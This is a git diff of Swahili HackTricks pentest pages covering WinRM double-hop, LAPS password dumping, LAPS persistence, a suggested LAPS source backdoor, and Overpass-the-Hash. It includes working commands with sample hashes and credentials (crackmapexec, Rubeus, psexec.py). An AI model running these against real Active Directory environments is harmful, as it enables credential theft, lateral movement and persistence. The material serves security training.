`winrs.exe` inaweza kutumika kwa ajili ya kusambaza maombi ya WinRM, ikiwa ni chaguo linaloweza kugundulika kidogo ikiwa ufuatiliaji wa PowerShell ni wasiwasi. Amri ifuatayo inaonyesha matumizi yake:
|
||||
`winrs.exe` inaweza kutumika kwa kusambaza maombi ya WinRM, labda kama chaguo linaloweza kugundulika kidogo ikiwa ufuatiliaji wa PowerShell unahusika. Amri hapa chini inaonyesha matumizi yake:
|
||||
```bash
|
||||
winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
|
||||
```
|
||||
### OpenSSH
|
||||
|
||||
Kuweka OpenSSH kwenye seva ya kwanza kunawezesha suluhisho la tatizo la double-hop, hasa linapokuwa na umuhimu katika mazingira ya jump box. Njia hii inahitaji ufungaji na usanidi wa OpenSSH kwa njia ya CLI kwenye Windows. Wakati inapowekwa kwa Uthibitishaji wa Nenosiri, hii inaruhusu seva ya kati kupata TGT kwa niaba ya mtumiaji.
|
||||
Kuweka OpenSSH kwenye server ya kwanza kunawezesha suluhisho la shida ya double-hop, hasa inayofaa kwa mazingira ya jump box. Mbinu hii inahitaji ufungaji wa CLI na usanidi wa OpenSSH kwa Windows. Wakati ilipowekwa kwa Uthibitishaji wa Nywila, hii inaruhusu server ya kati kupata TGT kwa niaba ya mtumiaji.
|
||||
|
||||
#### Hatua za Ufungaji wa OpenSSH
|
||||
|
||||
1. Pakua na hamisha faili ya hivi karibuni ya OpenSSH kwenye seva ya lengo.
|
||||
2. Fungua faili na endesha skripti ya `Install-sshd.ps1`.
|
||||
3. Ongeza sheria ya firewall ili kufungua bandari 22 na hakikisha huduma za SSH zinaendesha.
|
||||
1. Pakua na hamisha zip ya toleo jipya la OpenSSH kwenye server ya lengo.
|
||||
2. Fungua na endesha script ya `Install-sshd.ps1`.
|
||||
3. Ongeza sheria ya firewall kufungua bandari 22 na thibitisha huduma za SSH zinaendeshwa.
|
||||
|
||||
Ili kutatua makosa ya `Connection reset`, inaweza kuwa ni lazima kusasisha ruhusa ili kuruhusu kila mtu kupata haki ya kusoma na kutekeleza kwenye saraka ya OpenSSH.
|
||||
Ili kutatua makosa ya `Connection reset`, ruhusa inaweza kuhitaji kusasishwa kuruhusu kila mtu kusoma na kutekeleza upatikanaji kwenye saraka ya OpenSSH.
|
||||
```bash
|
||||
icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
|
||||
```
|
||||
|
@ -98,14 +102,18 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
|
|||
* [https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting](https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting)
|
||||
* [https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/](https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au ungependa kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,19 +4,24 @@
|
|||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionekana kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Taarifa Msingi
|
||||
|
||||
Local Administrator Password Solution (LAPS) ni zana inayotumiwa kusimamia mfumo ambapo **nywila za wasimamizi**, ambazo ni **za kipekee, zimechanganywa, na zinabadilishwa mara kwa mara**, zinatumika kwenye kompyuta zilizounganishwa na kikoa. Nywila hizi hifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji ambao wamepewa ruhusa kupitia Orodha za Kudhibiti Upatikanaji (ACLs). Usalama wa uhamisho wa nywila kutoka kwa mteja kwenda kwa seva unahakikishwa na matumizi ya **Kerberos version 5** na **Advanced Encryption Standard (AES)**.
|
||||
LAPS (Local Administrator Password Solution) ni zana inayotumiwa kusimamia mfumo ambapo **nywila za wasimamizi**, ambazo ni **za kipekee, zilizochanganywa, na zinazobadilishwa mara kwa mara**, zinatumika kwa kompyuta zilizounganishwa kwenye kikoa. Nywila hizi hifadhiwa kwa usalama ndani ya Active Directory na zinapatikana tu kwa watumiaji ambao wamepewa idhini kupitia Orodha za Kudhibiti Upatikanaji (ACLs). Usalama wa uhamishaji wa nywila kutoka kwa mteja kwenda kwa seva unahakikishwa na matumizi ya **Kerberos toleo la 5** na **Advanced Encryption Standard (AES)**.
|
||||
|
||||
Katika vitu vya kompyuta vya kikoa, utekelezaji wa LAPS unapelekea kuongezwa kwa sifa mbili mpya: **`ms-mcs-AdmPwd`** na **`ms-mcs-AdmPwdExpirationTime`**. Sifa hizi huhifadhi **nywila ya wasimamizi ya maandishi wazi** na **wakati wake wa kumalizika**, mtawalia.
|
||||
Katika vitu vya kompyuta vya kikoa, utekelezaji wa LAPS husababisha kuongezwa kwa sifa mbili mpya: **`ms-mcs-AdmPwd`** na **`ms-mcs-AdmPwdExpirationTime`**. Sifa hizi hifadhi **nywila ya msimamizi ya maandishi wazi** na **muda wake wa kumalizika**, mtawalia.
|
||||
|
||||
### Angalia ikiwa imeamilishwa
|
||||
```bash
|
||||
|
@ -33,9 +38,9 @@ Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs
|
|||
```
|
||||
### Upatikanaji wa Nywila za LAPS
|
||||
|
||||
Unaweza **kupakua sera ya LAPS iliyosindikwa** kutoka `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol` na kisha tumia **`Parse-PolFile`** kutoka kifurushi cha [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) kinaweza kutumika kubadilisha faili hii kuwa muundo unaoweza kusomwa na binadamu.
|
||||
Unaweza **kupakua sera ya LAPS ya asili** kutoka `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol` na kisha kutumia **`Parse-PolFile`** kutoka kwenye [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) pakiti inaweza kutumika kubadilisha faili hii kuwa muundo unaoeleweka na binadamu.
|
||||
|
||||
Zaidi ya hayo, **amri za LAPS za PowerShell za asili** zinaweza kutumika ikiwa zimefungwa kwenye kifaa ambacho tunayo upatikanaji wa:
|
||||
Zaidi ya hayo, **cmdlets za LAPS za asili za PowerShell** zinaweza kutumika ikiwa zimefungwa kwenye mashine ambayo tunayo ufikiaji nayo:
|
||||
```powershell
|
||||
Get-Command *AdmPwd*
|
||||
|
||||
|
@ -56,7 +61,7 @@ Find-AdmPwdExtendedRights -Identity Workstations | fl
|
|||
# Read the password
|
||||
Get-AdmPwdPassword -ComputerName wkstn-2 | fl
|
||||
```
|
||||
**PowerView** inaweza pia kutumika kujua **nani anaweza kusoma nenosiri na kulisoma**:
|
||||
**PowerView** inaweza kutumika pia kujua **nani anaweza kusoma nenosiri na kulisoma**:
|
||||
```powershell
|
||||
# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
|
||||
Get-AdmPwdPassword -ComputerName wkstn-2 | fl
|
||||
|
@ -66,9 +71,8 @@ Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
|
|||
```
|
||||
### LAPSToolkit
|
||||
|
||||
[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) inarahisisha uchambuzi wa LAPS na kazi kadhaa.\
|
||||
Moja ni kuchambua **`ExtendedRights`** kwa **kompyuta zote zilizo na LAPS imewezeshwa.** Hii itaonyesha **makundi** maalum **yaliyoruhusiwa kusoma nywila za LAPS**, ambazo mara nyingi ni watumiaji katika makundi ya kulindwa.\
|
||||
**Akaunti** ambayo imejiunga na kompyuta kwenye kikoa inapokea `Haki Zote za Extended` juu ya kompyuta hiyo, na haki hii inampa **akaunti** uwezo wa **kusoma nywila**. Uchambuzi unaweza kuonyesha akaunti ya mtumiaji ambaye anaweza kusoma nywila ya LAPS kwenye kompyuta. Hii inaweza kutusaidia **kulenga watumiaji maalum wa AD** ambao wanaweza kusoma nywila za LAPS.
|
||||
[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) inarahisisha uorodheshaji wa LAPS hii kwa kutumia kazi kadhaa. Moja ni kuchambua **`ExtendedRights`** kwa **kompyuta zote zilizo na LAPS imewezeshwa.** Hii itaonyesha **makundi** maalum **yaliyoruhusiwa kusoma nywila za LAPS**, ambazo mara nyingi ni watumiaji katika makundi ya kulindwa.\
|
||||
**Akaunti** ambayo imejiunga na kompyuta kwenye kikoa hupokea `Haki Zote za Kipekee` juu ya kompyuta hiyo, na haki hii inampa **akaunti** uwezo wa **kusoma nywila**. Uorodheshaji unaweza kuonyesha akaunti ya mtumiaji ambayo inaweza kusoma nywila ya LAPS kwenye kompyuta. Hii inaweza kutusaidia **kulenga watumiaji maalum wa AD** ambao wanaweza kusoma nywila za LAPS.
|
||||
```powershell
|
||||
# Get groups that can read passwords
|
||||
Find-LAPSDelegatedGroups
|
||||
|
@ -93,17 +97,17 @@ ComputerName Password Expiration
|
|||
DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41
|
||||
```
|
||||
## **Kudondosha Nywila za LAPS Kwa Kutumia Crackmapexec**
|
||||
Ikiwa hakuna ufikiaji wa powershell, unaweza kutumia haki hii vibaya kijijini kupitia LDAP kwa kutumia
|
||||
Ikiwa hakuna ufikiaji wa powershell unaweza kutumia mamlaka hii vibaya kijijini kupitia LDAP kwa kutumia
|
||||
```
|
||||
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
|
||||
```
|
||||
Hii itadumpisha nywila zote ambazo mtumiaji anaweza kusoma, kuruhusu kupata msingi bora na mtumiaji tofauti.
|
||||
Hii itadump nywila zote ambazo mtumiaji anaweza kusoma, ikikuruhusu kupata msingi bora na mtumiaji tofauti.
|
||||
|
||||
## **LAPS Uthabiti**
|
||||
## **Uthabiti wa LAPS**
|
||||
|
||||
### **Tarehe ya Muda wa Kufikia**
|
||||
### **Tarehe ya Muda wa Kufika**
|
||||
|
||||
Maradhi ya admin, ni **inawezekana kupata nywila** na **kuzuia** kifaa kutoka **kuboresha** nywila yake kwa **kuweka tarehe ya muda wa kufikia katika siku zijazo**.
|
||||
Mara baada ya kuwa msimamizi, ni **rahisi kupata nywila** na **kuzuia** mashine kutoka **kuboresha** nywila yake kwa **kuweka tarehe ya kumalizika muda kuwa ya baadaye**.
|
||||
```powershell
|
||||
# Get expiration time
|
||||
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
|
||||
|
@ -113,26 +117,30 @@ Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
|
|||
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
|
||||
```
|
||||
{% hint style="warning" %}
|
||||
Nenosiri bado yataweza kurejeshwa ikiwa **msimamizi** anatumia amri ya **`Reset-AdmPwdPassword`**; au ikiwa **Usiruhusu muda wa kumalizika kwa nenosiri kuwa mrefu kuliko ulivyohitajika na sera** imeamilishwa katika LAPS GPO.
|
||||
Nenosiri bado yataweza kurejeshwa ikiwa **msimamizi** anatumia **`Reset-AdmPwdPassword`** cmdlet; au ikiwa **Usiruhusu muda wa kumalizika kwa nenosiri kuwa mrefu kuliko ulivyowekwa na sera** imeanzishwa katika LAPS GPO.
|
||||
{% endhint %}
|
||||
|
||||
### Mlango wa Nyuma
|
||||
|
||||
Msimbo wa asili wa LAPS unaweza kupatikana [hapa](https://github.com/GreyCorbel/admpwd), kwa hivyo ni muhimu kuweka mlango wa nyuma katika msimbo (ndani ya njia ya `Get-AdmPwdPassword` katika `Main/AdmPwd.PS/Main.cs` kwa mfano) ambao uta **kuchukua nywila mpya au kuzihifadhi mahali fulani**.
|
||||
Msimbo wa chanzo cha asili kwa LAPS unaweza kupatikana [hapa](https://github.com/GreyCorbel/admpwd), hivyo niwezekano wa kuweka mlango wa nyuma katika msimbo (ndani ya `Get-AdmPwdPassword` method katika `Main/AdmPwd.PS/Main.cs` kwa mfano) ambao utahamisha **nenosiri mpya au kuyahifadhi mahali fulani**.
|
||||
|
||||
Kisha, tuunde tena `AdmPwd.PS.dll` na iweke kwenye kifaa katika njia ya `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` (na ubadilishe wakati wa kubadilisha).
|
||||
Kisha, tu compile `AdmPwd.PS.dll` mpya na kuipakia kwenye mashine katika `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` (na kubadilisha wakati wa marekebisho).
|
||||
|
||||
## Marejeo
|
||||
* [https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/](https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikitangazwa katika HackTricks**? Au ungependa kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikitangazwa kwenye HackTricks**? au ungependa kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) **kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegramu**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,38 +2,43 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Overpass The Hash/Pass The Key (PTK)
|
||||
|
||||
Shambulio la **Overpass The Hash/Pass The Key (PTK)** limeundwa kwa mazingira ambapo itifaki ya kawaida ya NTLM imezuiliwa, na uwakilishi wa Kerberos unapewa kipaumbele. Shambulio hili linatumia hash ya NTLM au funguo za AES za mtumiaji ili kupata tiketi za Kerberos, kuruhusu ufikiaji usiohalali kwa rasilimali ndani ya mtandao.
|
||||
Shambulio la **Overpass The Hash/Pass The Key (PTK)** limeundwa kwa mazingira ambapo itifaki ya kawaida ya NTLM imezuiliwa, na uwakala wa uthibitishaji wa Kerberos unachukua kipaumbele. Shambulio hili hutumia hash ya NTLM au funguo za AES za mtumiaji kupata tiketi za Kerberos, kuruhusu ufikiaji usiohalali wa rasilimali ndani ya mtandao.
|
||||
|
||||
Kutekeleza shambulio hili, hatua ya kwanza inahusisha kupata hash ya NTLM au nenosiri la akaunti ya mtumiaji anayelengwa. Baada ya kupata habari hii, Tiketi ya Kutoa Tiketi (TGT) kwa akaunti inaweza kupatikana, kuruhusu mshambuliaji kupata huduma au mashine ambazo mtumiaji ana ruhusa ya kufikia.
|
||||
Kutekeleza shambulio hili, hatua ya kwanza inahusisha kupata hash ya NTLM au nenosiri la akaunti ya mtumiaji anayelengwa. Baada ya kupata habari hii, Tiketi ya Kuidhinisha Tiketi (TGT) kwa akaunti inaweza kupatikana, kuruhusu mkaidi kupata huduma au mashine ambazo mtumiaji ana ruhusa.
|
||||
|
||||
Mchakato unaweza kuanzishwa kwa amri zifuatazo:
|
||||
Mchakato unaweza kuanzishwa na amri zifuatazo:
|
||||
```bash
|
||||
python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
|
||||
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
|
||||
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
|
||||
```
|
||||
Kwa hali ambazo zinahitaji AES256, chaguo la `-aesKey [ufunguo wa AES]` linaweza kutumika. Zaidi ya hayo, tiketi iliyopatikana inaweza kutumika na zana mbalimbali, ikiwa ni pamoja na smbexec.py au wmiexec.py, kuongeza wigo wa shambulio.
|
||||
Kwa matukio yanayohitaji AES256, chaguo la `-aesKey [ufunguo wa AES]` linaweza kutumika. Zaidi ya hayo, tiketi iliyopatikana inaweza kutumika na zana mbalimbali, ikiwa ni pamoja na smbexec.py au wmiexec.py, kueneza wigo wa shambulio.
|
||||
|
||||
Matatizo yanayokutwa kama _PyAsn1Error_ au _KDC hawezi kupata jina_ kwa kawaida yanatatuliwa kwa kusasisha maktaba ya Impacket au kutumia jina la mwenyeji badala ya anwani ya IP, kuhakikisha utangamano na KDC ya Kerberos.
|
||||
Matatizo yanayokutana kama vile _PyAsn1Error_ au _KDC haitaweza kupata jina_ kawaida hutatuliwa kwa kuboresha maktaba ya Impacket au kutumia jina la mwenyeji badala ya anwani ya IP, kuhakikisha utangamano na KDC ya Kerberos.
|
||||
|
||||
Mfululizo wa amri mbadala ukitumia Rubeus.exe unaonyesha nyanja nyingine ya mbinu hii:
|
||||
Mfululizo mbadala wa amri ukitumia Rubeus.exe unaonyesha upande mwingine wa mbinu hii:
|
||||
```bash
|
||||
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
|
||||
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
|
||||
```
|
||||
Mbinu hii inafanana na njia ya **Pass the Key**, ikilenga kuchukua udhibiti na kutumia tiketi moja kwa moja kwa madhumuni ya uwakilishi. Ni muhimu kuzingatia kuwa kuanzishwa kwa ombi la TGT husababisha tukio la `4768: Tiketi ya uwakilishi wa Kerberos (TGT) ilihitajika`, ikionyesha matumizi ya RC4-HMAC kwa chaguo-msingi, ingawa mifumo ya Windows ya kisasa inapendelea AES256.
|
||||
Hii njia inafanana na **Pass the Key** approach, ikilenga kuchukua na kutumia tiketi moja kwa moja kwa madhumuni ya uwakilishi. Ni muhimu kuzingatia kwamba kuanzisha ombi la TGT husababisha tukio `4768: Tiketi ya uthibitishaji wa Kerberos (TGT) ilihitajika`, ikionyesha matumizi ya RC4-HMAC kwa chaguo-msingi, ingawa mifumo ya Windows ya kisasa hupendelea AES256.
|
||||
|
||||
Ili kuzingatia usalama wa uendeshaji na kutumia AES256, amri ifuatayo inaweza kutumika:
|
||||
```bash
|
||||
|
@ -43,14 +48,18 @@ Ili kuzingatia usalama wa uendeshaji na kutumia AES256, amri ifuatayo inaweza ku
|
|||
|
||||
* [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
